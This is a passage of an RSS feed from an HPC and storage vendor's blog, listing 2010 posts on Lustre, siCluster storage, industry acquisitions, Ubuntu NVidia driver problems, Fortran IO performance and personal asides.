      <guid>https://blog.scalability.org/2010/07/approaching-1-penetration-into-top-500/</guid>
      <description>I know &amp;hellip; I know &amp;hellip; 1% isn&amp;rsquo;t much of the top500. But it&amp;rsquo;s progress. This is for siCluster storage clusters &amp;hellip; not the computing cluster portion. None in the top 10, but we are working on it.</description>
    </item>
    
    <item>
      <title>... and turns off their cloud storage bits ...</title>
      <link>https://blog.scalability.org/2010/07/and-turns-off-their-cloud-storage-bits/</link>
      <pubDate>Wed, 07 Jul 2010 00:04:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/and-turns-off-their-cloud-storage-bits/</guid>
      <description>EMC is &amp;hellip; um &amp;hellip; gently nudging &amp;hellip; with great force &amp;hellip; customers off of Atmos. One of the points we talk about with our customers is the concept of freedom from bricking in a physical sense. That is, our hardware and software stack will let you keep on using it and having it supported and supportable, even if we decide to turn the company into something unrelated to HPC and storage.</description>
    </item>
    
    <item>
      <title>EMC gobbles Greenplum</title>
      <link>https://blog.scalability.org/2010/07/emc-gobbles-greenplum/</link>
      <pubDate>Tue, 06 Jul 2010 23:54:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/emc-gobbles-greenplum/</guid>
      <description>While EMC is not really an HPC player in a significant sense, business analytics and informatics is definitely an HPC process. Greenplum has a modified version of PostgreSQL that is parallelized quite well. And they have been using it to target specific market segments inhabited by Teradata and others. So along comes EMC and snaps them up. There are probably several good and interesting reasons for this. One that hasn&amp;rsquo;t escaped me is that EMC sees many of its partners in the world creating vertically integrated offerings.</description>
    </item>
    
    <item>
      <title>Happy 4th of July</title>
      <link>https://blog.scalability.org/2010/07/happy-4th-of-july/</link>
      <pubDate>Sun, 04 Jul 2010 19:07:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/happy-4th-of-july/</guid>
      <description>For our readers outside the US, the 4th of July is our Independence day. It has become terribly commercialized. Its meaning has been subjugated to other imperatives. I personally find this sad, as the freedoms we enjoy here in the US are sadly not enjoyed everywhere &amp;hellip; and the meaning of this day in our history is being diluted. Our freedoms come at a cost, sometimes a terrible one. We ought to remember this on our day of independence.</description>
    </item>
    
    <item>
      <title>OT: Hilarious ...</title>
      <link>https://blog.scalability.org/2010/07/ot-hilarious/</link>
      <pubDate>Sat, 03 Jul 2010 11:10:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/ot-hilarious/</guid>
      <description>link to original
See more funny videos and funny pictures at CollegeHumor.</description>
    </item>
    
    <item>
      <title>This is going to leave a mark ... looks like there is an HPC component as well ...</title>
      <link>https://blog.scalability.org/2010/07/this-is-going-to-leave-a-mark-looks-like-there-is-an-hpc-component-as-well/</link>
      <pubDate>Fri, 02 Jul 2010 11:27:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/this-is-going-to-leave-a-mark-looks-like-there-is-an-hpc-component-as-well/</guid>
      <description>I saw this a few days ago and ignored it at first. Vendor bashing pieces are nothing new from the media. To paraphrase Mark Twain: rumors of Dell&amp;rsquo;s demise are greatly exaggerated. Dell is, and continues to be, a powerhouse at pushing machines out. Their innovation is, basically, customized machines in volume. There is no magic in their machines; they use the same parts from the same sources as others do.</description>
    </item>
    
    <item>
      <title>On the test track with a new model JackRabbit</title>
      <link>https://blog.scalability.org/2010/07/on-the-test-track-with-a-new-model-jackrabbit/</link>
      <pubDate>Fri, 02 Jul 2010 08:56:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/on-the-test-track-with-a-new-model-jackrabbit/</guid>
      <description>This is going out to a customer in about a week, though we have a little time to run tests. Tuning these units is like tuning an engine &amp;hellip; if you like to tweak and tune, you eventually learn where the parameters of this engine hit good efficiency. You get a feel for it. You tune one parameter, the vibration pattern changes slightly. You tune another parameter, you get another overtone.</description>
    </item>
    
    <item>
      <title>Do the heroic class systems provide a benefit to their vendors in terms of follow on sales?</title>
      <link>https://blog.scalability.org/2010/06/do-the-heroic-class-systems-provide-a-benefit-to-their-vendors-in-terms-of-follow-on-sales/</link>
      <pubDate>Wed, 30 Jun 2010 23:18:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/do-the-heroic-class-systems-provide-a-benefit-to-their-vendors-in-terms-of-follow-on-sales/</guid>
      <description>This discussion erupted on the beowulf list today. I responded to a question on this, pointing out that prestige adds nothing to the bottom line. What matters is, not so curiously, the bottom line. One author disagreed with me. His point was that prestige class systems translated into sales for the relevant vendors. I think his examples were stretches, and not applicable to HPC. All of the public (and private) responses I have seen seem to support my thesis on this.</description>
    </item>
    
    <item>
      <title>I am slowly coming to the realization ...</title>
      <link>https://blog.scalability.org/2010/06/i-am-slowly-coming-to-the-realization/</link>
      <pubDate>Wed, 30 Jun 2010 15:53:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/i-am-slowly-coming-to-the-realization/</guid>
      <description>that basic systems management and configuration are neither well known nor well understood, by the vast majority of people. Even the ones with certifications who should know this stuff. This is leading me to rethink some of the basic elements of the out-of-box experience. Part of this is driven by the tendency of certain distributions to remap, effectively randomly, their network port assignments. This is never, under any circumstances, a good thing.</description>
    </item>
    
    <item>
      <title>siCluster in action (blinken-blue-lights)</title>
      <link>https://blog.scalability.org/2010/06/sicluster-in-action-blinken-blue-lights/</link>
      <pubDate>Sun, 27 Jun 2010 15:37:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/sicluster-in-action-blinken-blue-lights/</guid>
      <description>Running some burn-in testing as I remember (older video) &amp;hellip; You can just feel the bits-a-flowing &amp;hellip; paraphrasing Apocalypse Now: &amp;ldquo;I love the smell of many GB/s in the morning &amp;hellip;&amp;rdquo;</description>
    </item>
    
    <item>
      <title>Hmm ... patenting a market process ....</title>
      <link>https://blog.scalability.org/2010/06/hmm-patenting-a-market-process/</link>
      <pubDate>Sat, 26 Jun 2010 20:35:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/hmm-patenting-a-market-process/</guid>
      <description>/. linked to a newly granted patent by Amazon. I am all for good patents, but given the number of &amp;hellip; er &amp;hellip; not so good ones I&amp;rsquo;ve read through, as well as obvious rehashing of existing work &amp;hellip; I don&amp;rsquo;t know what to make of this one. This seems &amp;hellip; well &amp;hellip; like patenting any instance of a market exchanging money for computer time and/or storage, based upon a pricing model determined by past histories or current demand/availability.</description>
    </item>
    
    <item>
      <title>RAID is not backup ... really ...</title>
      <link>https://blog.scalability.org/2010/06/raid-is-not-backup-really/</link>
      <pubDate>Mon, 21 Jun 2010 11:38:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/raid-is-not-backup-really/</guid>
      <description>A customer with a RAID6 and RAID1 OS drive just had what amounts to an epic failure. 4 drives gone. These are pretty good drives, not a known bad batch. Data points to environmental issues (heat). They don&amp;rsquo;t understand it, given the nice AC in there, but looking at the drives, a number of them were warm. We have fans doing a pull across the drives; they shouldn&amp;rsquo;t have been as warm as they were.</description>
    </item>
    
    <item>
      <title>You&#39;ve been comcasted!</title>
      <link>https://blog.scalability.org/2010/06/youve-been-comcasted/</link>
      <pubDate>Sun, 20 Jun 2010 21:07:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/youve-been-comcasted/</guid>
      <description>Strong storms ran through the area Friday night. And it messed with TV and internet. The former, not so concerned about. The latter &amp;hellip; scalability.org runs from a home machine. We don&amp;rsquo;t generate revenue from it, and I am not willing to host it with a provider, as I don&amp;rsquo;t want it to be more than marginally more costly than our internet service plus our home power to run the server (relatively light BTW).</description>
    </item>
    
    <item>
      <title>You knew something like this was coming ...</title>
      <link>https://blog.scalability.org/2010/06/you-knew-something-like-this-was-coming/</link>
      <pubDate>Fri, 18 Jun 2010 14:57:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/you-knew-something-like-this-was-coming/</guid>
      <description>Oracle setting Solaris on HP boxen. Oracle wants the hardware revenue too &amp;hellip; though it could also be a step to dropping x64 platforms for Solaris.
I can&amp;rsquo;t see how this is a good move for Solaris ubiquity, given the ability of HP to move hardware. And the name of the game for growing OS support is &amp;hellip; curiously &amp;hellip; ubiquity.</description>
    </item>
    
    <item>
      <title>Fortran IO giving customers grief</title>
      <link>https://blog.scalability.org/2010/06/fortran-io-giving-customers-grief/</link>
      <pubDate>Fri, 11 Jun 2010 22:26:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/fortran-io-giving-customers-grief/</guid>
      <description>This is annoying. Intel&amp;rsquo;s compilers do unbuffered IO by default (as in out of the box). Which means if you have code like this:
#define BIG 1000000000
real*8 X(BIG)
do i=1,BIG
write (unit=10,*) X(i)
enddo
then you are going to suffer terrible performance, as Fortran (Intel&amp;rsquo;s compiled version) will do a flush at the end of each write. Which means, for a high performance network file system, you are going to be hitting it with many ~25 byte writes.</description>
    </item>
    
    <item>
      <title>Unintended consequences ...</title>
      <link>https://blog.scalability.org/2010/06/unintended-consequences/</link>
      <pubDate>Fri, 11 Jun 2010 14:34:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/unintended-consequences/</guid>
      <description>So the fine folks at Adobe have decided to yank the beta for 10.1 flash player for 64 bit Linux. And in a Kafkaesque manner, have suggested discussing this in the forum &amp;hellip; which they marked as &amp;ldquo;read only&amp;rdquo;. Umm &amp;hellip;. are they trying, purposely, to lend credence to Steve Jobs&#39; points about closed technologies that are bug ridden?
This project is being closed apparently due to a zero day hard-to-fix exploit &amp;hellip; based upon a supposition that the recent flash exploits had been patched on some platforms.</description>
    </item>
    
    <item>
      <title>Open source and billion dollar ($10^9 USD) companies</title>
      <link>https://blog.scalability.org/2010/06/open-source-and-billion-dollar-109usd-companies/</link>
      <pubDate>Fri, 11 Jun 2010 12:36:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/open-source-and-billion-dollar-109usd-companies/</guid>
      <description>An interesting post in Computerworld UK on why open source companies, and Red Hat in particular, are not larger. The raison d&amp;rsquo;etre for open source in business is an effective reduction in costs. The increase in quality over some of the closed source alternatives is also very attractive. Increased quality lowers costs. Of course, not all open source is better &amp;hellip; witness the changes Ubuntu has made in their NVidia support, opting for the lower quality nouveau driver as compared to the very good NVidia driver.</description>
    </item>
    
    <item>
      <title>... and parascale appears to be in trouble ...</title>
      <link>https://blog.scalability.org/2010/06/and-parascale-appears-to-be-in-trouble/</link>
      <pubDate>Tue, 08 Jun 2010 20:19:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/and-parascale-appears-to-be-in-trouble/</guid>
      <description>Provider of a &amp;ldquo;cloud NAS&amp;rdquo; (getting to be a crowded market), and then doing strategy switching &amp;hellip; hmmm. The Register has the story. Sounds like they tried to grab one of our mantras, apparently unsuccessfully. I am not sure if they are a competitor; we&amp;rsquo;ve never run into them. The Register piece notes the crowded NAS landscape, but doesn&amp;rsquo;t seem to be looking at the cluster storage landscape which, I&amp;rsquo;d argue, was more of the parascale play.</description>
    </item>
    
    <item>
      <title>ext3 branch Next3 released</title>
      <link>https://blog.scalability.org/2010/06/ext3-branch-next3-released/</link>
      <pubDate>Tue, 08 Jun 2010 17:17:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/ext3-branch-next3-released/</guid>
      <description>This is interesting at some level, as it is ext3 with snapshots. It is also not as interesting as it is based on &amp;hellip; ext3 &amp;hellip; which isn&amp;rsquo;t exactly a high performance file system. Not to mention the 8TB limit on volumes, and 2TB on files. Haven&amp;rsquo;t seen customers run into the latter, have seen them run into the former. Head first, and hard. I&amp;rsquo;d argue that this capability would be better merged with ext4, though as I understand it, Ted Ts&amp;rsquo;o isn&amp;rsquo;t quite interested at this point.</description>
    </item>
    
    <item>
      <title>Lustre&#39;s future</title>
      <link>https://blog.scalability.org/2010/06/lustres-future/</link>
      <pubDate>Tue, 08 Jun 2010 13:48:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/lustres-future/</guid>
      <description>I&amp;rsquo;ve written here in the past about this. I have concerns as we have multiple customers using Lustre, and the official roadmap for support/releases for Lustre is anything but assuring. Moreover, it completely forecloses upon independent appliance makers using Lustre without blessing from a competitive/engaged Oracle &amp;hellip; it is left to the reader to decide whether this will or will not happen. As I had noted before, this throws a wrench in the works of the smaller fry like Terascala.</description>
    </item>
    
    <item>
      <title>ZFS on Linux?</title>
      <link>https://blog.scalability.org/2010/06/zfs-on-linux/</link>
      <pubDate>Tue, 08 Jun 2010 10:52:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/zfs-on-linux/</guid>
      <description>It appears that this is in process &amp;hellip; no, not simply the ZFS on FUSE, but a full fledged kernel subsystem. This is interesting. ZFS is, of course, the Sun file system which has had an altogether ridiculous amount of hype, while having a modest set of nice features. The license Solaris and OpenSolaris were released under was not compatible with the GPL, hence many people considered this OSino (Open Source in name only), as it was not legally possible to intermix the code between the largest GPL project (Linux) and the OpenSolaris code base.</description>
    </item>
    
    <item>
      <title>Oracle/Sun to axe products based upon Opteron</title>
      <link>https://blog.scalability.org/2010/06/oraclesun-to-axe-products-based-upon-opteron/</link>
      <pubDate>Mon, 07 Jun 2010 07:26:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/oraclesun-to-axe-products-based-upon-opteron/</guid>
      <description>Well, this link from 2 weeks ago in The Reg claims this. If this is the case, and I have no reason to doubt it, not only has Thumper been EOLed, but Thor as well. We are already working out trade-in deals for customers with some of these EOLed bits. Looks like more in progress soon.</description>
    </item>
    
    <item>
      <title>The joy of VOIP</title>
      <link>https://blog.scalability.org/2010/06/the-joy-of-voip/</link>
      <pubDate>Sun, 06 Jun 2010 17:43:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/the-joy-of-voip/</guid>
      <description>Our VOIP provider has some significant problems. A utility provider can&amp;rsquo;t make changes and then insist that the reason the phones enter endless reboot cycles is something we&amp;rsquo;ve changed in our own network (we haven&amp;rsquo;t). Their firmware updates seem not to like traversing our router anymore. But we didn&amp;rsquo;t change our router. They did change their firmware. Since that change, we&amp;rsquo;ve had all manner of problems. So I think we are going to have to fire them and find a new provider.</description>
    </item>
    
    <item>
      <title>Taking our lumps and some of our partners lumps while we are at it</title>
      <link>https://blog.scalability.org/2010/06/taking-our-lumps-and-some-of-our-partners-lumps-while-we-are-at-it/</link>
      <pubDate>Sat, 05 Jun 2010 20:33:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/taking-our-lumps-and-some-of-our-partners-lumps-while-we-are-at-it/</guid>
      <description>We had a recent event that badly irked a customer, and rightly so. It took far too long for us to be able to get a replacement part for them. I want to talk about this a little. I won&amp;rsquo;t name the customer or partner, or the product. The punchline for the customer was that they got their replacement part more than a month late. For an enterprise shop. This was IMO unacceptable.</description>
    </item>
    
    <item>
      <title>Going to need to write up a site preparation sheet ...</title>
      <link>https://blog.scalability.org/2010/06/going-to-need-to-write-up-a-site-preparation-sheet/</link>
      <pubDate>Sat, 05 Jun 2010 19:51:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/going-to-need-to-write-up-a-site-preparation-sheet/</guid>
      <description>&amp;hellip; that covers some basic things. Like cooling, power, IPMI, &amp;hellip; We&amp;rsquo;ve seen a common thread throughout a number of data centers recently, where we&amp;rsquo;ve placed a machine. Occasionally the airflow will be too low or, following the fads as of late, the air too warm, to effectively cool a high performance machine. More to the point, warmer air or lower airflow is fine when your density per rack U is not that high.</description>
    </item>
    
    <item>
      <title>This wouldn&#39;t surprise me if true ...</title>
      <link>https://blog.scalability.org/2010/06/this-wouldnt-surprise-me-if-true/</link>
      <pubDate>Tue, 01 Jun 2010 08:07:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/this-wouldnt-surprise-me-if-true/</guid>
      <description>Financial Times reports Google is restricting Windows deployments for security reasons. We do still run windows, but mostly in VMs at this point. Frankly, this is one of the very few ways we know that we can be safe in using Windows. We can recover from the nearly inevitable viri/trojans quickly. In part by not letting Windows touch the silicon directly. We can bottle it up, put hard restrictions on it, and if it gets infected, revert very quickly to a previous non-infected variant.</description>
    </item>
    
    <item>
      <title>siCluster attached to #77 on top500 list</title>
      <link>https://blog.scalability.org/2010/05/sicluster-attached-to-77-on-top500-list/</link>
      <pubDate>Mon, 31 May 2010 21:24:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/sicluster-attached-to-77-on-top500-list/</guid>
      <description>Our siCluster storage cluster, currently running Lustre 1.8.2 on CentOS 5.4, is attached to the #77 system on the top500 supercomputer list.</description>
    </item>
    
    <item>
      <title>So what do you do when a former customer builds a poor copy of your design?</title>
      <link>https://blog.scalability.org/2010/05/so-what-do-you-do-when-a-former-customer-builds-a-poor-copy-of-your-design/</link>
      <pubDate>Mon, 31 May 2010 21:14:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/so-what-do-you-do-when-a-former-customer-builds-a-poor-copy-of-your-design/</guid>
      <description>Gotta laugh a little. Feel bad for them, they don&amp;rsquo;t quite know all the ins and outs of what they are getting into. And that&amp;rsquo;s fine. Nothing quite like jumping into it with both feet and hoping you can stay afloat. More power to them. I hope they survive this choice, though the last folks that did that to us didn&amp;rsquo;t last a year.</description>
    </item>
    
    <item>
      <title>Capital update</title>
      <link>https://blog.scalability.org/2010/05/capital-update/</link>
      <pubDate>Sat, 29 May 2010 14:11:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/capital-update/</guid>
      <description>Last year, we began working with a local group whose founder/president I had known for a few years previously. I won&amp;rsquo;t name them. We have a real need for capital. The company is self funded, and this means we fund all purchases out of our own pocket, or from our own lines of credit. And in some cases, being a small business, from my credit card (Lesson one in how to give a spouse a coronary: put a large purchase on a personal credit card &amp;hellip; you know, 5 or more digits before the decimal point).</description>
    </item>
    
    <item>
      <title>Maybe I need to move ...</title>
      <link>https://blog.scalability.org/2010/05/maybe-i-need-to-move/</link>
      <pubDate>Sat, 29 May 2010 13:22:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/maybe-i-need-to-move/</guid>
      <description>Saw this post on /. and the article it linked to. In it, the authors discuss human capital, the density of &amp;ldquo;smart people&amp;rdquo; (which they define as those with baccalaureate and graduate degrees). Using their particular definition (I won&amp;rsquo;t say if I do or do not agree with it right now), Detroit area, where we are, is near the bottom of the long tail. I can say that the places they indicate at the top of the heap &amp;hellip; SF, NYC, Minneapolis, Chicago, Seattle, Boston, Miami &amp;hellip; all places I have spent time working in with customers and users &amp;hellip; I&amp;rsquo;ve very much enjoyed my stay.</description>
    </item>
    
    <item>
      <title>been very busy ...</title>
      <link>https://blog.scalability.org/2010/05/been-very-busy/</link>
      <pubDate>Thu, 27 May 2010 13:57:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/been-very-busy/</guid>
      <description>&amp;hellip; slow posting &amp;hellip; will get back soon.</description>
    </item>
    
    <item>
      <title>OT:  tournament update</title>
      <link>https://blog.scalability.org/2010/05/ot-tournament-update/</link>
      <pubDate>Sun, 23 May 2010 13:48:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/ot-tournament-update/</guid>
      <description>So it was an experience getting back from Chicago to attend my tournament. But it was worth it. First the experience: Flight out was supposed to be at 4:40pm CST. Was delayed a little (airport was hectic), annoyed me a bit, as I had volunteered to help on the tournament setup, and I wound up missing this. Oh, and I left my ever-present bluetooth headset at the security checkpoint. More on that at the end.</description>
    </item>
    
    <item>
      <title>The future of kernel-specific version subsystems</title>
      <link>https://blog.scalability.org/2010/05/the-future-of-kernel-specific-version-subsystems/</link>
      <pubDate>Sun, 23 May 2010 12:56:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/the-future-of-kernel-specific-version-subsystems/</guid>
      <description>One of the issues we ran into with Lustre on our siCluster was the inability to use the kernel of our choice. Lustre is quite invasive in its patch sets. So modern kernels, ones with subsystem fixes, driver updates, and other things we need &amp;hellip;. can&amp;rsquo;t necessarily host Lustre without some serious forward porting of the code base. And this got me thinking. This isn&amp;rsquo;t the only project tied to specific kernel versions, and effectively unable to use an arbitrary kernel version.</description>
    </item>
    
    <item>
      <title>This conversation ... its just so enjoyable ... I must have it again ... no ... really ...</title>
      <link>https://blog.scalability.org/2010/05/this-conversation-its-just-so-enjoyable-i-must-have-it-again-no-really/</link>
      <pubDate>Wed, 19 May 2010 16:18:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/this-conversation-its-just-so-enjoyable-i-must-have-it-again-no-really/</guid>
      <description>Customer: We were told you make really fast tightly coupled storage and computing systems. Me (in my best Dr. Galakowicz voice): Yes, yes we do. They are fast. Really fast. Did I mention, they are fast? Customer: That&amp;rsquo;s great, &amp;lsquo;cause we need fast! Fast is really important to us. Fast is good. Really fast. Fast. &amp;hellip; er &amp;hellip; but we have a problem. Me: yes? Customer: er &amp;hellip; we can only buy from vendor X &amp;hellip; they won&amp;rsquo;t let us buy anything else Me: Even if you have a quantifiable business need, and your project&amp;rsquo;s objectives wouldn&amp;rsquo;t be met by vendor X&amp;rsquo;s slow stuff, which represents an effective existential project risk?</description>
    </item>
    
    <item>
      <title>What a difference a distribution makes for Lustre</title>
      <link>https://blog.scalability.org/2010/05/what-a-difference-a-distribution-makes-for-lustre/</link>
      <pubDate>Wed, 19 May 2010 11:07:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/what-a-difference-a-distribution-makes-for-lustre/</guid>
      <description>Lustre 1.8.2 on SuSE is, IMO, broken. I am not sure if it is repairable. Most of my comments on the brittle nature of Lustre come from this. Reloading with CentOS 5.4, we are rock solid stable. It&amp;rsquo;s scary. I am not sure what the issue is, but I think all future Lustre deployments we are going to do will focus upon CentOS 5.4.</description>
    </item>
    
    <item>
      <title>Half open source drivers</title>
      <link>https://blog.scalability.org/2010/05/half-open-source-drivers/</link>
      <pubDate>Mon, 17 May 2010 01:14:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/half-open-source-drivers/</guid>
      <description>[Update] my apologies on the trackback/pingback spam. 33 of these. Given how people are attempting to influence Google et al.&amp;rsquo;s searching algorithm by initiating these pingbacks/trackbacks &amp;hellip; This is what SEO buys us folks. It wastes our time and resources cleaning up after it, and it negatively impacts the quality of responses to queries. This is good &amp;hellip; how? Trackbacks and pingbacks disabled for now. I&amp;rsquo;d posted about NVidia issues with Ubuntu 10.</description>
    </item>
    
    <item>
      <title>I have two copies of this in softcover ... now its digital ... quite nice!</title>
      <link>https://blog.scalability.org/2010/05/i-have-two-copies-of-this-in-softcover-now-its-digital-quite-nice/</link>
      <pubDate>Fri, 14 May 2010 14:12:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/i-have-two-copies-of-this-in-softcover-now-its-digital-quite-nice/</guid>
      <description>This. Maybe if I am lucky, I can get to play with these tools again.</description>
    </item>
    
    <item>
      <title>4 for 4, and its not good</title>
      <link>https://blog.scalability.org/2010/05/4-for-4-and-its-not-good/</link>
      <pubDate>Sun, 09 May 2010 12:03:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/4-for-4-and-its-not-good/</guid>
      <description>Ubuntu 10.04. 4 separate machines. All having some sort of nVidia card for CUDA/GPU work. All started from base desktop load. All, every single one of them, unable to update to CUDA enabled drivers. Or even to the Canonical hosted non-CUDA drivers. Get a black screen. On all 4 boxen. With vanilla loads. With very different motherboards. I appear to be in good company. Few people can get the NVidia drivers working.</description>
    </item>
    
    <item>
      <title>ever have one of &#34;those days&#34; ...</title>
      <link>https://blog.scalability.org/2010/05/ever-have-one-of-those-days-2/</link>
      <pubDate>Wed, 05 May 2010 23:54:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/ever-have-one-of-those-days-2/</guid>
      <description>My wife consoles me with a yin-yang view. Hopefully some large amount of goodness is to occur soon. Ever have a day where you just can&amp;rsquo;t get ahead of the support queue &amp;hellip; stuff keeps piling up. You run an errand and people call. You walk them through problems, and more call. For every one problem you fix, two new ones show up. Pretty soon, everyone is answering phones, and dealing with problems.</description>
    </item>
    
    <item>
      <title>A very poor choice</title>
      <link>https://blog.scalability.org/2010/04/a-very-poor-choice/</link>
      <pubDate>Wed, 28 Apr 2010 14:45:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/a-very-poor-choice/</guid>
      <description>Ubuntu 10.04 isn&amp;rsquo;t out yet. But will be soon. In it, there are some good things, some nice things. And an insanely poor choice. They are effectively preventing users with NVidia cards from using NVidia&amp;rsquo;s drivers. You have to go through some absolutely insane hoops to be able to use NVidia&amp;rsquo;s drivers. The Nouveau driver is incomplete, isn&amp;rsquo;t up to the performance on 3D graphics, nor the stability of the NVidia drivers.</description>
    </item>
    
    <item>
      <title>Lustre&#39;s future, part 1 of a few</title>
      <link>https://blog.scalability.org/2010/04/lustres-future-part-1-of-a-few/</link>
      <pubDate>Sat, 24 Apr 2010 13:43:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/lustres-future-part-1-of-a-few/</guid>
      <description>[update] Jeff said substantially the same thing last year. Go figure :O I haven&amp;rsquo;t written up my thoughts after seeing the slides, speaking with some of the support team, seeing John West and John Leidel&amp;rsquo;s discussion of Lustre 2.0 on InsideHPC &amp;hellip; &amp;hellip; but I need to. So here is the first (very brief) comment. Here are a set of slides (hat tip to Chris S) which neatly summarizes what we see customers thinking.</description>
    </item>
    
    <item>
      <title>Now 2TB SAS drives are within ~10% the price of 2TB SATA drives ...</title>
      <link>https://blog.scalability.org/2010/04/now-2tb-sas-drives-are-within-10-the-price-of-2tb-sata-drives/</link>
      <pubDate>Sat, 24 Apr 2010 13:01:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/now-2tb-sas-drives-are-within-10-the-price-of-2tb-sata-drives/</guid>
      <description>(7200 RPM 3.5 inch) SAS has a few specific advantages over (7200 RPM 3.5 inch) SATA, but not enough to justify a 50% premium for storage clusters and many storage apps. At 10%? Yeah, I think that could work. I&amp;rsquo;d like to build a few more of these. Definitely.</description>
    </item>
    
    <item>
      <title>color me impressed</title>
      <link>https://blog.scalability.org/2010/04/color-me-impressed-2/</link>
      <pubDate>Fri, 23 Apr 2010 17:32:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/color-me-impressed-2/</guid>
      <description>GAMESS running on Magny Cours and Istanbul &amp;hellip; I rebuilt them with OpenMPI 1.5 and 1.4.2. Running across 24 cores right now on each. They are running a test case now for which the previous fastest machine has been a Nehalem 3.2 GHz system. They are tearing up the track &amp;hellip;. The sockets version isn&amp;rsquo;t as good as the MPI version. You will see/hear more about this soon, in another white paper.</description>
    </item>
    
    <item>
      <title>1 CAD is now greater than 1 USD ...</title>
      <link>https://blog.scalability.org/2010/04/1-cad-is-now-greater-than-1-usd/</link>
      <pubDate>Fri, 23 Apr 2010 15:05:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/1-cad-is-now-greater-than-1-usd/</guid>
      <description>c.f. here
Live rates at 2010.04.23 19:18:28 UTC: 1.00 USD = 0.999750 CAD; 1 CAD = 1.00025 USD. Yeah, I know it fluctuates. Still, nice to have parity.</description>
    </item>
    
    <item>
      <title>New Magny Cours, Istanbul, and Nehalem BLAST white paper is up</title>
      <link>https://blog.scalability.org/2010/04/new-magny-cours-istanbul-and-nehalem-blast-white-paper-is-up/</link>
      <pubDate>Thu, 22 Apr 2010 09:13:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/new-magny-cours-istanbul-and-nehalem-blast-white-paper-is-up/</guid>
      <description>Grab a copy from here. We have been playing with Magny Cours and Istanbul for a while, and will be generating a number of white papers around these efforts. Comparisons to Nehalem of similar clock speed, and if available, other units. Magny Cours is a very interesting chip. 12 processor cores in a single socket. This has some interesting implications for performance, and you have to pay attention to things you might not have thought you needed to before.</description>
    </item>
    
    <item>
      <title>What if your state is hostile to your business?</title>
      <link>https://blog.scalability.org/2010/04/what-if-your-state-is-hostile-to-your-business/</link>
      <pubDate>Tue, 20 Apr 2010 13:25:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/what-if-your-state-is-hostile-to-your-business/</guid>
      <description>Here in Michigan, we need to find something new to do. This economy is built upon manufacturing, which is rapidly fleeing for the lower cost regions of the world. It is a foundational and critical mistake to try to reverse this, as manufacturing will always seek the lowest costs &amp;hellip; so unless you can provide them, you are going to lose this business eventually. Which means you shouldn&amp;rsquo;t invest tax dollars &amp;hellip; my dollars &amp;hellip; in helping such businesses &amp;ldquo;grow&amp;rdquo; here, as it inordinately transfers such tax burdens onto &amp;hellip; wait for it &amp;hellip; me and my fellow tax payers and small businesses.</description>
    </item>
    
    <item>
      <title>oh yay ... memory and disk pricing on the rise</title>
      <link>https://blog.scalability.org/2010/04/oh-yay-memory-and-disk-pricing-on-the-rise/</link>
      <pubDate>Mon, 19 Apr 2010 14:47:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/oh-yay-memory-and-disk-pricing-on-the-rise/</guid>
      <description>Up about 20% over the last month. Gotta love it. :(</description>
    </item>
    
    <item>
      <title>Ok, hunkering down for the hard work</title>
      <link>https://blog.scalability.org/2010/04/ok-hunkering-down-for-the-hard-work/</link>
      <pubDate>Fri, 16 Apr 2010 16:46:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/ok-hunkering-down-for-the-hard-work/</guid>
      <description>I have a white paper to get done by Sunday, an RFP response to get done by tomorrow, and a set of 3 quotes to do. Getting one done now, the rest are later tonight. No rest for the wicked.</description>
    </item>
    
    <item>
      <title>(will there be) a future for OpenSolaris?</title>
      <link>https://blog.scalability.org/2010/04/will-there-be-a-future-for-opensolaris/</link>
      <pubDate>Fri, 16 Apr 2010 16:00:14 +0000</pubDate>
      
